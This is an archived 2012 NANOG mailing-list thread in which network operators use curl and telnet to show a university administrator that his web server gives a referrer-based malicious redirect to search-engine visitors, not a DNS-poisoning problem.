From: Jeremy Hanmer 
[mailto:jeremy.han...@dreamhost.com<mailto:jeremy.han...@dreamhost.com>]
Sent: Tuesday, June 26, 2012 9:58 PM
To: Matthew Black
Cc: nanog@nanog.org<mailto:nanog@nanog.org>
Subject: Re: DNS poisoning at Google?
It's not DNS.  If you're sure there's no htaccess files in place, check your 
content (even that stored in a database) for anything that might be altering 
data based on referrer.  This simple test shows what I mean:

Airy:~ user$ curl -e 'http://google.com' csulb.edu<http://csulb.edu>  
301 Moved Permanently

Moved Permanently
The document has moved http://www.couchtarts.com/media.php";>here.


Running curl without the -e argument gives the proper site contents.
On Jun 26, 2012, at 9:24 PM, Matthew Black 
mailto:matthew.bl...@csulb.edu>> wrote:

> Running Apache on three Solaris webservers behind a load balancer. No MS 
> Windows!
>
> Not sure how malicious software could get between our load balancer and Unix 
> servers. Thanks for the tip!
>
> matthew black
> information technology services
> california state university, long beach
>
>
>
> From: Landon Stewart [mailto:lstew...@superb.net<mailto:lstew...@superb.net>]
> Sent: Tuesday, June 26, 2012 9:07 PM
> To: Matthew Black
> Cc: nanog@nanog.org<mailto:nanog@nanog.org>
> Subject: Re: DNS poisoning at Google?
>
> Is it possible that some malicious software is listening and injecting a 
> redirect on the wire?  We've seen this before with a Windows machine being 
> infected.
> On 26 June 2012 20:53, Matthew Black 
> mailto:matthew.bl...@csulb.edu><mailto:matthew.bl...@csulb.edu<mailto:matthew.bl...@csulb.edu>>>
>  wrote:
> Google Safe Browsing and Firefox have marked our website as containing 
> malware. They claim our home page returns no results, but redirects users to 
> another compromised website 
> couchtarts.com<http://couchtarts.com><http://couchtarts.com>.
>
> We have thoroughly examined our root .htaccess and httpd.conf files and are 
> not redirecting to the problem target site. No recent changes either.
>
> We ran some NSLOOKUPs against various public DNS servers and intermittently 
> get results that are NOT our servers.
>
> We believe the DNS servers used by Google's crawler have been poisoned.
>
> Can anyone shed some light on this?
>
> matthew black
> information technology services
> california state university, long beach
> www.csulb.edu<http://www.csulb.edu><http://www.csulb.edu><http://www.csulb.edu>
>
>
>
> --
> Landon Stewart 
> mailto:lstew...@superb.net<mailto:lstew...@superb.net>>>
> Sr. Administrator
> Systems Engineering
> Superb Internet Corp - 888-354-6128 x 4199 Web 
> hosting and more "Ahead
> of the Rest":
> http://www.superbhosting.net<http://www.superbhosting.net/>
>






--
Landon Stewart mailto:lstew...@superb.net>>
Sr. Administrator
Systems Engineering
Superb Internet Corp - 888-354-6128 x 4199
Web hosting and more "Ahead of the Rest": 
http://www.superbhosting.net<http://www.superbhosting.net/>

Re: DNS poisoning at Google?

[Landon Stewart]

There is definitely a 301 redirect.

$ curl -I --referer http://www.google.com/ http://www.csulb.edu/
HTTP/1.1 301 Moved Permanently
Date: Wed, 27 Jun 2012 05:36:31 GMT
Server: Apache/2.0.63
Location: http://www.couchtarts.com/media.php
Connection: close
Content-Type: text/html; charset=iso-8859-1

On 26 June 2012 22:05, Matthew Black  wrote:

> Google Webtools reports a problem with our HOMEPAGE "/". That page is not
> redirecting anywhere.
> They also report problems with some 48 other primary sites, none of which
> redirect to the offending couchtarts.
>
> matthew black
> information technology services
> california state university, long beach
>
>
>
>
>
> -Original Message-
> From: Jeremy Hanmer [mailto:jeremy.han...@dreamhost.com]
> Sent: Tuesday, June 26, 2012 9:58 PM
> To: Matthew Black
> Cc: nanog@nanog.org
> Subject: Re: DNS poisoning at Google?
>
> It's not DNS.  If you're sure there's no htaccess files in place, check
> your content (even that stored in a database) for anything that might be
> altering data based on referrer.  This simple test shows what I mean:
>
> Airy:~ user$ curl -e 'http://google.com' csulb.edu  "-//IETF//DTD HTML 2.0//EN"> 
> 301 Moved Permanently
> 
> Moved Permanently
> The document has moved http://www.couchtarts.com/media.php
> ">here.
> 
>
> Running curl without the -e argument gives the proper site contents.
>
> On Jun 26, 2012, at 9:24 PM, Matthew Black 
> wrote:
>
> > Running Apache on three Solaris webservers behind a load balancer. No MS
> Windows!
> >
> > Not sure how malicious software could get between our load balancer and
> Unix servers. Thanks for the tip!
> >
> > matthew black
> > information technology services
> > california state university, long beach
> >
> >
> >
> > From: Landon Stewart [mailto:lstew...@superb.net]
> > Sent: Tuesday, June 26, 2012 9:07 PM
> > To: Matthew Black
> > Cc: nanog@nanog.org
> > Subject: Re: DNS poisoning at Google?
> >
> > Is it possible that some malicious software is listening and injecting a
> redirect on the wire?  We've seen this before with a Windows machine being
> infected.
> > On 26 June 2012 20:53, Matthew Black  matthew.bl...@csulb.edu>> wrote:
> > Google Safe Browsing and Firefox have marked our website as containing
> malware. They claim our home page returns no results, but redirects users
> to another compromised website couchtarts.com<http://couchtarts.com>.
> >
> > We have thoroughly examined our root .htaccess and httpd.conf files and
> are not redirecting to the problem target site. No recent changes either.
> >
> > We ran some NSLOOKUPs against various public DNS servers and
> intermittently get results that are NOT our servers.
> >
> > We believe the DNS servers used by Google's crawler have been poisoned.
> >
> > Can anyone shed some light on this?
> >
> > matthew black
> > information technology services
> > california state university, long beach
> > www.csulb.edu<http://www.csulb.edu><http://www.csulb.edu>
> >
> >
> >
> > --
> > Landon Stewart mailto:lstew...@superb.net>>
> > Sr. Administrator
> > Systems Engineering
> > Superb Internet Corp - 888-354-6128 x 4199 Web hosting and more "Ahead
> > of the Rest":
> > http://www.superbhosting.net<http://www.superbhosting.net/>
> >
>
>
>
>
>


-- 
Landon Stewart 
Sr. Administrator
Systems Engineering
Superb Internet Corp - 888-354-6128 x 4199
Web hosting and more "Ahead of the Rest": http://www.superbhosting.net

RE: DNS poisoning at Google?

[Matthew Black]

Yes, thanks. I'll have to read up on that.

My e-mail was showing extra stuff at the end of the sample command lines, which 
confused me:

Airy:~ user$ curl -e 'http://google.com' csulb.edu  
...###

Sigh, I just Outlook not to strip extra line breaks.


matthew black
information technology services
california state university, long beach



-Original Message-
From: John Levine [mailto:jo...@iecc.com] 
Sent: Tuesday, June 26, 2012 10:30 PM
To: nanog@nanog.org
Cc: Matthew Black
Subject: Re: DNS poisoning at Google?

In article 
 you 
write:
>I'm not familiar with curl and don't understand what I type and what 
>are results. Are you suggesting that when google refers to our website, we 
>pick that up and redirect to couchtarts?

curl is a command line www client that's worth knowing about.

And I observe the same thing, using my own local DNS cache -- if I fetch the 
home page from csulb.edu or www.csulb.edu with Google as the referrer, it 
returns a page that redirects to couchtarts.

Sorry, dude, you've been pwn3d.

R's,
John


>Airy:~ user$ curl -e 'http://google.com' csulb.edu PUBLIC "-//IETF//DTD HTML 2.0//EN"> 
>301 Moved Permanently
>
>Moved Permanently
>The document has moved href="http://www.couchtarts.com/media.php";>here.
>

Re: DNS poisoning at Google?

[Christopher Morrow]

On Wed, Jun 27, 2012 at 1:26 AM, Matthew Black  wrote:
> Thank you for that helpful instruction!
>
> curl doesn't work because our webserver is firewalled against outbound 
> traffic. The telnet to port 80 showed me the problem. I also didn't 
> understand when output was placed at the end of the command line, instead of 
> starting on the next line...that looked like something I was supposed to type.
>

sorry... often when I end up testing something like this I cut/paste
from a buffer, so:

telnet bloop 80



read-output... In the case of your server:

GET / HTTP/1.0
Host: www.csulb.edu
Referer: http://www.google.com/


all gets pasted once the 'telnet www.csulb.edu 80' connects...

the output is the stuff that includes the 'redirect to couchtarts'.

-chris


>
> matthew black
> information technology services
> california state university, long beac
>
> -Original Message-
> From: christopher.mor...@gmail.com [mailto:christopher.mor...@gmail.com] On 
> Behalf Of Christopher Morrow
> Sent: Tuesday, June 26, 2012 10:17 PM
> To: Ishmael Rufus
> Cc: Matthew Black; nanog@nanog.org; Jeremy Hanmer
> Subject: Re: DNS poisoning at Google?
>
> for example, from the commandline with telnet:
>
> morrowc@teensy:~$ telnet www.csulb.edu 80 Trying 134.139.1.60...
> Connected to gaggle.its.csulb.edu.
> Escape character is '^]'.
> GET / HTTP/1.0
> Host: www.csulb.edu
> Referer: http://www.google.com/
>
>
>
> HTTP/1.1 301 Moved Permanently
> Date: Wed, 27 Jun 2012 05:04:04 GMT
> Server: Apache/2.0.63
> Location: http://www.couchtarts.com/media.php
> Content-Length: 243
> Connection: close
> Content-Type: text/html; charset=iso-8859-1
>
>  
> 301 Moved Permanently
> 
> Moved Permanently
> The document has moved  href="http://www.couchtarts.com/media.php";>here.
> 
> Connection closed by foreign host.
>
>
> oops :( fail.
>
> On Wed, Jun 27, 2012 at 1:13 AM, Ishmael Rufus  wrote:
>> Invoking the referrer on your site recommends a redirect to
>> couchtarts. I agree with Jeremy and Jeff check your htaccess files,
>> conf files and anything that  calls RewriteCond or Rewrite
>>
>> On Wed, Jun 27, 2012 at 12:05 AM, Matthew Black 
>> wrote:
>>
>>> Google Webtools reports a problem with our HOMEPAGE "/". That page is
>>> not redirecting anywhere.
>>> They also report problems with some 48 other primary sites, none of
>>> which redirect to the offending couchtarts.
>>>
>>> matthew black
>>> information technology services
>>> california state university, long beach
>>>
>>>
>>>
>>>
>>>
>>> -Original Message-
>>> From: Jeremy Hanmer [mailto:jeremy.han...@dreamhost.com]
>>> Sent: Tuesday, June 26, 2012 9:58 PM
>>> To: Matthew Black
>>> Cc: nanog@nanog.org
>>> Subject: Re: DNS poisoning at Google?
>>>
>>> It's not DNS.  If you're sure there's no htaccess files in place,
>>> check your content (even that stored in a database) for anything that
>>> might be altering data based on referrer.  This simple test shows what I 
>>> mean:
>>>
>>> Airy:~ user$ curl -e 'http://google.com' csulb.edu >> PUBLIC "-//IETF//DTD HTML 2.0//EN"> 
>>> 301 Moved Permanently
>>> 
>>> Moved Permanently
>>> The document has moved >> href="http://www.couchtarts.com/media.php
>>> ">here.
>>> 
>>>
>>> Running curl without the -e argument gives the proper site contents.
>>>
>>> On Jun 26, 2012, at 9:24 PM, Matthew Black 
>>> wrote:
>>>
>>> > Running Apache on three Solaris webservers behind a load balancer.
>>> > No MS
>>> Windows!
>>> >
>>> > Not sure how malicious software could get between our load balancer
>>> > and
>>> Unix servers. Thanks for the tip!
>>> >
>>> > matthew black
>>> > information technology services
>>> > california state university, long beach
>>> >
>>> >
>>> >
>>> > From: Landon Stewart [mailto:lstew...@superb.net]
>>> > Sent: Tuesday, June 26, 2012 9:07 PM
>>> > To: Matthew Black
>>> > Cc: nanog@nanog.org
>>> > Subject: Re: DNS poisoning at Google?
>>> >
>>> > Is it possible that some malicious software is listening and
>>> > injecting a
>>> redirect on the wire?  We've seen this before with a W

Re: DNS poisoning at Google?

[John Levine]

In article 
 you 
write:
>I'm not familiar with curl and don't understand what I type and what are 
>results. Are you suggesting that when
>google refers to our website, we pick that up and redirect to couchtarts?

curl is a command line www client that's worth knowing about.

And I observe the same thing, using my own local DNS cache -- if I
fetch the home page from csulb.edu or www.csulb.edu with Google as the
referrer, it returns a page that redirects to couchtarts.

Sorry, dude, you've been pwn3d.

R's,
John


>Airy:~ user$ curl -e 'http://google.com' csulb.edu "-//IETF//DTD HTML 2.0//EN"> 
>301 Moved Permanently
>
>Moved Permanently
>The document has moved href="http://www.couchtarts.com/media.php";>here.
>

RE: DNS poisoning at Google?

[Matthew Black]

Thank you for that helpful instruction!

curl doesn't work because our webserver is firewalled against outbound traffic. 
The telnet to port 80 showed me the problem. I also didn't understand when 
output was placed at the end of the command line, instead of starting on the 
next line...that looked like something I was supposed to type.


matthew black
information technology services
california state university, long beac

-Original Message-
From: christopher.mor...@gmail.com [mailto:christopher.mor...@gmail.com] On 
Behalf Of Christopher Morrow
Sent: Tuesday, June 26, 2012 10:17 PM
To: Ishmael Rufus
Cc: Matthew Black; nanog@nanog.org; Jeremy Hanmer
Subject: Re: DNS poisoning at Google?

for example, from the commandline with telnet:

morrowc@teensy:~$ telnet www.csulb.edu 80 Trying 134.139.1.60...
Connected to gaggle.its.csulb.edu.
Escape character is '^]'.
GET / HTTP/1.0
Host: www.csulb.edu
Referer: http://www.google.com/



HTTP/1.1 301 Moved Permanently
Date: Wed, 27 Jun 2012 05:04:04 GMT
Server: Apache/2.0.63
Location: http://www.couchtarts.com/media.php
Content-Length: 243
Connection: close
Content-Type: text/html; charset=iso-8859-1

 
301 Moved Permanently

Moved Permanently
The document has moved http://www.couchtarts.com/media.php";>here.

Connection closed by foreign host.


oops :( fail.

On Wed, Jun 27, 2012 at 1:13 AM, Ishmael Rufus  wrote:
> Invoking the referrer on your site recommends a redirect to 
> couchtarts. I agree with Jeremy and Jeff check your htaccess files, 
> conf files and anything that  calls RewriteCond or Rewrite
>
> On Wed, Jun 27, 2012 at 12:05 AM, Matthew Black 
> wrote:
>
>> Google Webtools reports a problem with our HOMEPAGE "/". That page is 
>> not redirecting anywhere.
>> They also report problems with some 48 other primary sites, none of 
>> which redirect to the offending couchtarts.
>>
>> matthew black
>> information technology services
>> california state university, long beach
>>
>>
>>
>>
>>
>> -Original Message-
>> From: Jeremy Hanmer [mailto:jeremy.han...@dreamhost.com]
>> Sent: Tuesday, June 26, 2012 9:58 PM
>> To: Matthew Black
>> Cc: nanog@nanog.org
>> Subject: Re: DNS poisoning at Google?
>>
>> It's not DNS.  If you're sure there's no htaccess files in place, 
>> check your content (even that stored in a database) for anything that 
>> might be altering data based on referrer.  This simple test shows what I 
>> mean:
>>
>> Airy:~ user$ curl -e 'http://google.com' csulb.edu > PUBLIC "-//IETF//DTD HTML 2.0//EN"> 
>> 301 Moved Permanently
>> 
>> Moved Permanently
>> The document has moved > href="http://www.couchtarts.com/media.php
>> ">here.
>> 
>>
>> Running curl without the -e argument gives the proper site contents.
>>
>> On Jun 26, 2012, at 9:24 PM, Matthew Black 
>> wrote:
>>
>> > Running Apache on three Solaris webservers behind a load balancer. 
>> > No MS
>> Windows!
>> >
>> > Not sure how malicious software could get between our load balancer 
>> > and
>> Unix servers. Thanks for the tip!
>> >
>> > matthew black
>> > information technology services
>> > california state university, long beach
>> >
>> >
>> >
>> > From: Landon Stewart [mailto:lstew...@superb.net]
>> > Sent: Tuesday, June 26, 2012 9:07 PM
>> > To: Matthew Black
>> > Cc: nanog@nanog.org
>> > Subject: Re: DNS poisoning at Google?
>> >
>> > Is it possible that some malicious software is listening and 
>> > injecting a
>> redirect on the wire?  We've seen this before with a Windows machine 
>> being infected.
>> > On 26 June 2012 20:53, Matthew Black > matthew.bl...@csulb.edu>> wrote:
>> > Google Safe Browsing and Firefox have marked our website as 
>> > containing
>> malware. They claim our home page returns no results, but redirects 
>> users to another compromised website couchtarts.com<http://couchtarts.com>.
>> >
>> > We have thoroughly examined our root .htaccess and httpd.conf files 
>> > and
>> are not redirecting to the problem target site. No recent changes either.
>> >
>> > We ran some NSLOOKUPs against various public DNS servers and
>> intermittently get results that are NOT our servers.
>> >
>> > We believe the DNS servers used by Google's crawler have been poisoned.
>> >
>> > Can anyone shed some light on this?
>> >
>> > matthew black
>> > information technology services
>> > california state university, long beach 
>> > www.csulb.edu<http://www.csulb.edu><http://www.csulb.edu>
>> >
>> >
>> >
>> > --
>> > Landon Stewart mailto:lstew...@superb.net>>
>> > Sr. Administrator
>> > Systems Engineering
>> > Superb Internet Corp - 888-354-6128 x 4199 Web hosting and more 
>> > "Ahead of the Rest":
>> > http://www.superbhosting.net<http://www.superbhosting.net/>
>> >
>>
>>
>>
>>
>>

Re: DNS poisoning at Google?

[Chris Griffin]

Also shows a redirect if you use bing.com or yahoo.com (and probably others) 
but not, for instance, blah.com...

Tnx
Chris

On Jun 27, 2012, at 1:13 AM, David Hubbard wrote:

> Well as Jeremy pointed out, your site is issuing
> redirects, he gave you the command to show it:
> 
> curl -e 'http://google.com' csulb.edu
> 
> So if you're sure your server(s) haven't been hacked,
> your application appears to have been hacked.  It only
> issues the redirect if the visitor comes in from a
> google search.
> 
> 
> 
> 
>> -Original Message-
>> From: Matthew Black [mailto:matthew.bl...@csulb.edu] 
>> Sent: Wednesday, June 27, 2012 1:03 AM
>> To: Michael J Wise
>> Cc: nanog@nanog.org
>> Subject: RE: DNS poisoning at Google?
>> 
>> Q:have you consulted the logs?
>> 
>> Seriously? Our servers have multiple log files due to 
>> multiple virtual hosts. Our primary domain log file on just 
>> one server has over 600,000 records x 3 servers.
>> 
>> Probably over 100,000 304 redirects in our logs.
>> 
>> couchtarts.com does not appear in our log files.
>> 
>> 
>> matthew black
>> information technology services
>> california state university, long beach
>> 
>> -----Original Message-
>> From: Michael J Wise [mailto:mjw...@kapu.net] 
>> Sent: Tuesday, June 26, 2012 9:56 PM
>> To: Matthew Black
>> Cc: nanog@nanog.org
>> Subject: Re: DNS poisoning at Google?
>> 
>> 
>> On Jun 26, 2012, at 9:35 PM, Matthew Black wrote:
>> 
>>> Yes, we've used the Google Webmaster Tools a lot today. 
>> Submitted multiple requests and they keep insisting that our 
>> site issues a redirect. Unable to duplicate the problem here.
>> 
>> ... have you consulted the logs?
>> If the redirect is there, it ... 1) might not be from the 
>> home page, and 2) could be in ... user content?
>> 
>> awk '{if ($9 ~ /304/) { print $0 }}' access_log.
>> ... or some such.
>> Granted, might be a storm of " " -> index.html redirects, but 
>> they should be grep -v 'able in short order.
>> You might also look for the rDNS of the Google spider to see 
>> exactly where it is looking, and what it sees.
>> 
>> Aloha,
>> Michael.
>> -- 
>> "Please have your Internet License 
>> and Usenet Registration handy..."
>> 
>> 
>> 
>> 
>> 
>> 
> 


---
Chris Griffin   cgrif...@ufl.edu
Sr. Network Engineer - CCNP Phone: (352) 273-1051
CNS - Network Services  Fax:   (352) 392-9440
University of Florida/FLR   Gainesville, FL 32611

Re: DNS poisoning at Google?

[David Miller]

On 6/27/2012 1:13 AM, Matthew Black wrote:
> I'm not familiar with curl and don't understand what I type and what are 
> results. Are you suggesting that when google refers to our website, we pick 
> that up and redirect to couchtarts?
>
> matthew black
> information technology services
> california state university, long beach

Referer is an HTTP header that can be included in requests to your web
server
  - http://en.wikipedia.org/wiki/HTTP_referer

"man curl"

   -e, --referer 
  (HTTP)  Sends the "Referer Page" information to the HTTP
server. This can also be set with the -H, --header flag of course.  When
used
  with -L, --location you can append ";auto" to the
--referer URL to make curl automatically set the previous  URL  when 
it  follows  a
  Location: header. The ";auto" string can be used alone,
even if you don't set an initial --referer.


$ curl -v -e 'http://google.com' csulb.edu
* About to connect() to csulb.edu port 80 (#0)
*   Trying 134.139.1.60...
* connected
* Connected to csulb.edu (134.139.1.60) port 80 (#0)
> GET / HTTP/1.1
> User-Agent: curl/7.24.0 (x86_64-pc-linux-gnu) libcurl/7.24.0
OpenSSL/1.0.0g zlib/1.2.5
> Host: csulb.edu
> Accept: */*
> Referer: http://google.com
>
< HTTP/1.1 301 Moved Permanently
< Date: Wed, 27 Jun 2012 05:11:39 GMT
< Server: Apache/2.0.63
< Location: http://www.couchtarts.com/media.php
< Content-Length: 243
< Connection: close
< Content-Type: text/html; charset=iso-8859-1
<


301 Moved Permanently

Moved Permanently
The document has moved http://www.couchtarts.com/media.php";>here.

* Closing connection #0


-DMM

>
>
>
>
> -Original Message-
> From: Jeremy Hanmer [mailto:jer...@hq.newdream.net] 
> Sent: Tuesday, June 26, 2012 9:59 PM
> To: Matthew Black
> Cc: nanog@nanog.org
> Subject: Re: DNS poisoning at Google?
>
> It's not DNS.  If you're sure there's no htaccess files in place, check your 
> content (even that stored in a database) for anything that might be altering 
> data based on referrer.  This simple test shows what I mean:
>
> Airy:~ user$ curl -e 'http://google.com' csulb.edu  "-//IETF//DTD HTML 2.0//EN"> 
> 301 Moved Permanently
> 
> Moved Permanently
> The document has moved  href="http://www.couchtarts.com/media.php";>here.
> 
>
> Running curl without the -e argument gives the proper site contents.  
>
> On Jun 26, 2012, at 9:35 PM, Matthew Black  wrote:
>
>> Yes, we've used the Google Webmaster Tools a lot today. Submitted multiple 
>> requests and they keep insisting that our site issues a redirect. Unable to 
>> duplicate the problem here.
>>
>> matthew black
>> information technology services
>> california state university, long beach
>>
>> From: Ishmael Rufus [mailto:sakam...@gmail.com]
>> Sent: Tuesday, June 26, 2012 9:34 PM
>> To: Matthew Black
>> Cc: David Hubbard; nanog@nanog.org
>> Subject: Re: DNS poisoning at Google?
>>
>> Have you tried using Google Webmaster tools?
>> On Tue, Jun 26, 2012 at 11:28 PM, Matthew Black 
>> mailto:matthew.bl...@csulb.edu>> wrote:
>> Running Apache on three Solaris servers behind a load balancer.
>>
>> I forgot how to lookup our AS number to see if it matches couchtarts.
>>
>> matthew black
>> information technology services
>> california state university, long beach
>>
>> -Original Message-
>> From: David Hubbard 
>> [mailto:dhubb...@dino.hostasaurus.com<mailto:dhubbard@dino.hostasaurus
>> .com>]
>> Sent: Tuesday, June 26, 2012 9:14 PM
>> To: nanog@nanog.org<mailto:nanog@nanog.org>
>> Subject: RE: DNS poisoning at Google?
>>
>> Typically if google were pulling your site sometimes from the wrong IP, 
>> their safe browsing page should indicate it being on another AS number in 
>> addition to the correct one 2152:
>>
>> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=ht
>> tp ://www.csulb.edu<http://www.csulb.edu>
>>
>> For example, the couchtarts site they claim yours is redirecting to:
>>
>> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=ht
>> tp ://www.couchtarts.com<http://www.couchtarts.com>
>>
>> That site's DNS is screwed up and some requests are sent to a different IP 
>> at a different host, so Google picked up both AS numbers.
>>
>> Could one of your domain's subdomains be what is actually infected?  You 
>> seem to have a bunch of them, maybe google is penalizing the whole domain 
>&g

Re: DNS poisoning at Google?

[Christopher Morrow]

for example, from the commandline with telnet:

morrowc@teensy:~$ telnet www.csulb.edu 80
Trying 134.139.1.60...
Connected to gaggle.its.csulb.edu.
Escape character is '^]'.
GET / HTTP/1.0
Host: www.csulb.edu
Referer: http://www.google.com/



HTTP/1.1 301 Moved Permanently
Date: Wed, 27 Jun 2012 05:04:04 GMT
Server: Apache/2.0.63
Location: http://www.couchtarts.com/media.php
Content-Length: 243
Connection: close
Content-Type: text/html; charset=iso-8859-1



301 Moved Permanently

Moved Permanently
The document has moved http://www.couchtarts.com/media.php";>here.

Connection closed by foreign host.


oops :( fail.

On Wed, Jun 27, 2012 at 1:13 AM, Ishmael Rufus  wrote:
> Invoking the referrer on your site recommends a redirect to couchtarts. I
> agree with Jeremy and Jeff check your htaccess files, conf files and
> anything that  calls RewriteCond or Rewrite
>
> On Wed, Jun 27, 2012 at 12:05 AM, Matthew Black 
> wrote:
>
>> Google Webtools reports a problem with our HOMEPAGE "/". That page is not
>> redirecting anywhere.
>> They also report problems with some 48 other primary sites, none of which
>> redirect to the offending couchtarts.
>>
>> matthew black
>> information technology services
>> california state university, long beach
>>
>>
>>
>>
>>
>> -Original Message-
>> From: Jeremy Hanmer [mailto:jeremy.han...@dreamhost.com]
>> Sent: Tuesday, June 26, 2012 9:58 PM
>> To: Matthew Black
>> Cc: nanog@nanog.org
>> Subject: Re: DNS poisoning at Google?
>>
>> It's not DNS.  If you're sure there's no htaccess files in place, check
>> your content (even that stored in a database) for anything that might be
>> altering data based on referrer.  This simple test shows what I mean:
>>
>> Airy:~ user$ curl -e 'http://google.com' csulb.edu > "-//IETF//DTD HTML 2.0//EN"> 
>> 301 Moved Permanently
>> 
>> Moved Permanently
>> The document has moved http://www.couchtarts.com/media.php
>> ">here.
>> 
>>
>> Running curl without the -e argument gives the proper site contents.
>>
>> On Jun 26, 2012, at 9:24 PM, Matthew Black 
>> wrote:
>>
>> > Running Apache on three Solaris webservers behind a load balancer. No MS
>> Windows!
>> >
>> > Not sure how malicious software could get between our load balancer and
>> Unix servers. Thanks for the tip!
>> >
>> > matthew black
>> > information technology services
>> > california state university, long beach
>> >
>> >
>> >
>> > From: Landon Stewart [mailto:lstew...@superb.net]
>> > Sent: Tuesday, June 26, 2012 9:07 PM
>> > To: Matthew Black
>> > Cc: nanog@nanog.org
>> > Subject: Re: DNS poisoning at Google?
>> >
>> > Is it possible that some malicious software is listening and injecting a
>> redirect on the wire?  We've seen this before with a Windows machine being
>> infected.
>> > On 26 June 2012 20:53, Matthew Black > matthew.bl...@csulb.edu>> wrote:
>> > Google Safe Browsing and Firefox have marked our website as containing
>> malware. They claim our home page returns no results, but redirects users
>> to another compromised website couchtarts.com<http://couchtarts.com>.
>> >
>> > We have thoroughly examined our root .htaccess and httpd.conf files and
>> are not redirecting to the problem target site. No recent changes either.
>> >
>> > We ran some NSLOOKUPs against various public DNS servers and
>> intermittently get results that are NOT our servers.
>> >
>> > We believe the DNS servers used by Google's crawler have been poisoned.
>> >
>> > Can anyone shed some light on this?
>> >
>> > matthew black
>> > information technology services
>> > california state university, long beach
>> > www.csulb.edu<http://www.csulb.edu><http://www.csulb.edu>
>> >
>> >
>> >
>> > --
>> > Landon Stewart mailto:lstew...@superb.net>>
>> > Sr. Administrator
>> > Systems Engineering
>> > Superb Internet Corp - 888-354-6128 x 4199 Web hosting and more "Ahead
>> > of the Rest":
>> > http://www.superbhosting.net<http://www.superbhosting.net/>
>> >
>>
>>
>>
>>
>>

Re: DNS poisoning at Google?

[Ishmael Rufus]

Invoking the referrer on your site recommends a redirect to couchtarts. I
agree with Jeremy and Jeff check your htaccess files, conf files and
anything that  calls RewriteCond or Rewrite

On Wed, Jun 27, 2012 at 12:05 AM, Matthew Black wrote:

> Google Webtools reports a problem with our HOMEPAGE "/". That page is not
> redirecting anywhere.
> They also report problems with some 48 other primary sites, none of which
> redirect to the offending couchtarts.
>
> matthew black
> information technology services
> california state university, long beach
>
>
>
>
>
> -Original Message-
> From: Jeremy Hanmer [mailto:jeremy.han...@dreamhost.com]
> Sent: Tuesday, June 26, 2012 9:58 PM
> To: Matthew Black
> Cc: nanog@nanog.org
> Subject: Re: DNS poisoning at Google?
>
> It's not DNS.  If you're sure there's no htaccess files in place, check
> your content (even that stored in a database) for anything that might be
> altering data based on referrer.  This simple test shows what I mean:
>
> Airy:~ user$ curl -e 'http://google.com' csulb.edu  "-//IETF//DTD HTML 2.0//EN"> 
> 301 Moved Permanently
> 
> Moved Permanently
> The document has moved http://www.couchtarts.com/media.php
> ">here.
> 
>
> Running curl without the -e argument gives the proper site contents.
>
> On Jun 26, 2012, at 9:24 PM, Matthew Black 
> wrote:
>
> > Running Apache on three Solaris webservers behind a load balancer. No MS
> Windows!
> >
> > Not sure how malicious software could get between our load balancer and
> Unix servers. Thanks for the tip!
> >
> > matthew black
> > information technology services
> > california state university, long beach
> >
> >
> >
> > From: Landon Stewart [mailto:lstew...@superb.net]
> > Sent: Tuesday, June 26, 2012 9:07 PM
> > To: Matthew Black
> > Cc: nanog@nanog.org
> > Subject: Re: DNS poisoning at Google?
> >
> > Is it possible that some malicious software is listening and injecting a
> redirect on the wire?  We've seen this before with a Windows machine being
> infected.
> > On 26 June 2012 20:53, Matthew Black  matthew.bl...@csulb.edu>> wrote:
> > Google Safe Browsing and Firefox have marked our website as containing
> malware. They claim our home page returns no results, but redirects users
> to another compromised website couchtarts.com<http://couchtarts.com>.
> >
> > We have thoroughly examined our root .htaccess and httpd.conf files and
> are not redirecting to the problem target site. No recent changes either.
> >
> > We ran some NSLOOKUPs against various public DNS servers and
> intermittently get results that are NOT our servers.
> >
> > We believe the DNS servers used by Google's crawler have been poisoned.
> >
> > Can anyone shed some light on this?
> >
> > matthew black
> > information technology services
> > california state university, long beach
> > www.csulb.edu<http://www.csulb.edu><http://www.csulb.edu>
> >
> >
> >
> > --
> > Landon Stewart mailto:lstew...@superb.net>>
> > Sr. Administrator
> > Systems Engineering
> > Superb Internet Corp - 888-354-6128 x 4199 Web hosting and more "Ahead
> > of the Rest":
> > http://www.superbhosting.net<http://www.superbhosting.net/>
> >
>
>
>
>
>

RE: DNS poisoning at Google?

[David Hubbard]

Well as Jeremy pointed out, your site is issuing
redirects, he gave you the command to show it:

curl -e 'http://google.com' csulb.edu

So if you're sure your server(s) haven't been hacked,
your application appears to have been hacked.  It only
issues the redirect if the visitor comes in from a
google search.




> -Original Message-
> From: Matthew Black [mailto:matthew.bl...@csulb.edu] 
> Sent: Wednesday, June 27, 2012 1:03 AM
> To: Michael J Wise
> Cc: nanog@nanog.org
> Subject: RE: DNS poisoning at Google?
> 
> Q:have you consulted the logs?
> 
> Seriously? Our servers have multiple log files due to 
> multiple virtual hosts. Our primary domain log file on just 
> one server has over 600,000 records x 3 servers.
> 
> Probably over 100,000 304 redirects in our logs.
> 
> couchtarts.com does not appear in our log files.
> 
> 
> matthew black
> information technology services
> california state university, long beach
> 
> -Original Message-
> From: Michael J Wise [mailto:mjw...@kapu.net] 
> Sent: Tuesday, June 26, 2012 9:56 PM
> To: Matthew Black
> Cc: nanog@nanog.org
> Subject: Re: DNS poisoning at Google?
> 
> 
> On Jun 26, 2012, at 9:35 PM, Matthew Black wrote:
> 
> > Yes, we've used the Google Webmaster Tools a lot today. 
> Submitted multiple requests and they keep insisting that our 
> site issues a redirect. Unable to duplicate the problem here.
> 
> ... have you consulted the logs?
> If the redirect is there, it ... 1) might not be from the 
> home page, and 2) could be in ... user content?
> 
> awk '{if ($9 ~ /304/) { print $0 }}' access_log.
> ... or some such.
> Granted, might be a storm of " " -> index.html redirects, but 
> they should be grep -v 'able in short order.
> You might also look for the rDNS of the Google spider to see 
> exactly where it is looking, and what it sees.
> 
> Aloha,
> Michael.
> -- 
> "Please have your Internet License 
>  and Usenet Registration handy..."
> 
> 
> 
> 
> 
> 

RE: DNS poisoning at Google?

[Matthew Black]

I'm not familiar with curl and don't understand what I type and what are 
results. Are you suggesting that when google refers to our website, we pick 
that up and redirect to couchtarts?

matthew black
information technology services
california state university, long beach




-Original Message-
From: Jeremy Hanmer [mailto:jer...@hq.newdream.net] 
Sent: Tuesday, June 26, 2012 9:59 PM
To: Matthew Black
Cc: nanog@nanog.org
Subject: Re: DNS poisoning at Google?

It's not DNS.  If you're sure there's no htaccess files in place, check your 
content (even that stored in a database) for anything that might be altering 
data based on referrer.  This simple test shows what I mean:

Airy:~ user$ curl -e 'http://google.com' csulb.edu  
301 Moved Permanently

Moved Permanently
